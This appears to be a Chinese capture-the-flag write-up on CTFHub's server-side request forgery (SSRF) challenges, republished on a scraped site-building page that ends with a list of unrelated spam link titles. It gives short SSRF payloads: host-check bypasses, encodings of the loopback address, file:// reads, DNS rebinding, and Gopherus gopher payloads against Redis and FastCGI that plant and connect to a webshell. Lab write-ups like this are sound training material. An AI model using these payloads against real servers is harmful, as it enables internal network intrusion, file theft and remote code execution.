当前位置: 首页 > wzjs >正文

学校网站源码电子商务平台经营者名词解释

学校网站源码,电子商务平台经营者名词解释,简洁手机购物网站会员中心模板,安阳县地图1.URL Bypass 打开题目 请求的URL中必须包含http://notfound.ctfhub.com,使用来绕过即可 /?urlhttp://notfound.ctfhub.com127.0.0.1/flag.php 成功获得flag 2.数字IP Bypass 开启题目 发现127以及172被过滤了 尝试别的绕过 127.0.0.1–>localhost 127.0…

1.URL Bypass

打开题目

请求的URL中必须包含http://notfound.ctfhub.com,使用@来绕过即可

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

成功获得flag 

2.数字IP Bypass

开启题目

 发现127以及172被过滤了

尝试别的绕过

127.0.0.1–>localhost

127.0.0.1–>7F000001       ⼗六进制

127.0.0.1–>2130706433      ⼗进制

127.0.0.1–>2130706433       Enclosed Alphanumerics

3. 302跳转 Bypass

请求会跳转到其他页面

绕过姿势

?url=http://0.0.0.0/flag.php

?url=http://localhost/flag.php

4.DNS重绑定 Bypass

 

打开附件网站https://lock.cmpxchg8b.com/rebinder.html , 绑定两个回环地址

?url=http://7f000001.7f000002.rbndr.us/flag.php 

 5.内网访问

开启题目:/?url=http://127.0.0.1/flag.php

6.伪协议读取文件

/?url=file:///var/www/html/flag.php

查看网页源代码 

7. 端口扫描

访问http://127.0.0.1:8000 使⽤BP抓包并进⾏爆破

 

 8.Redis协议

开启环境,打开Kali,使用Gopherus工具

python2 gopherus.py --exploit redis

进⾏⼀次URL编码后并访问上传的⽂件 shell.php

 

 连接⽊⻢获得flag

9. FastCGI协议

开启环境

 使⽤Gopherus⼯具⽣成payload:                    python2 gopherus.py --exploit fastcgi

将⽣成的payload再进⾏第⼆次编码即可访问上传

 

链接已经上传的shell⽊⻢ 在根⽬录发现flag

 

10. POST请求

打开环境

 查看网页源代码,输入提交key值

 提交请求时抓包,修改为gopher协议进行post请求

 进行url编码

将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a ,再次进行url编码

将编码提交到url, 页面出现flag(注意:有的编码平台可能会把冒号和双斜杠进行编码 构造payload时要修改回来)

 

11. 上传文件

?url=file:///var/www/html/flag.php

源码中需⼿动添加提交框并提交⽂件⼤⼩⼤于0的⽂件并抓包

修改为gopher协议进行post请求

 

 然后与上面POST请求一样,url编码⼀次把%0A 换成 %0D%0A ,然后再进行第⼆次编码

在url后加上二次编码后的gopher协议 发现页面有flag

http://www.dtcms.com/wzjs/826520.html

相关文章:

  • 达州科创网站建设公司网站手机端打不开
  • 苏州网站推广软件台州做网站需要多少钱
  • 歪咪小麻花官方网站怎么做零售网站备案许可证号查询网站
  • WordPress情侣网站济南莱芜金点子信息港
  • 营销网站 深圳飞数石家庄网站建设
  • 网站开发的相关岗位wordpress账户密码忘记
  • 网站策划图上海网络推广工资
  • 支付宝网站接口申请建筑书店
  • 上海cms建站机关单位网站建设合同
  • 写网站教程有手机版本wordpress
  • 怎么在wordpress免费注册博客网站微信公众号 手机网站
  • 郑州彩票网站开发辽宁建设工程信息网专家库官网
  • 政协网站法治建设版块老榕树网站建设
  • 网站制作公司如何运作什么网站做视频
  • 石狮网站网站建设推广平台
  • 南阳建网站wordpress hello dolly
  • 网站登录系统怎么做哈尔滨高端模板建站
  • 怎么确定电商网站建设的目标wordpress 导入用户
  • 大连平台网站建设展厅设计ppt汇报
  • 国外哪个网站做c 挣钱网站公司怎么做的好
  • 天目西路网站建设茶网站建设
  • 演出票务网站建设英大保险公司官网
  • 深圳宝安区天气李勇seo的博客
  • 网站为什么需要备案艺术设计专业学什么
  • 外贸网站建站平台宝塔wordpress ssl证书
  • 江津网站建设口碑医院网站建设熊掌号
  • 网站建设项目风险管理的主要内容开源电商网站建设价格
  • 浦口区网站建设免费推广网站2022
  • 星巴克网站建设没有充值入口的传奇
  • 网站和域名都注册怎么连接成网址网站规划和建设方案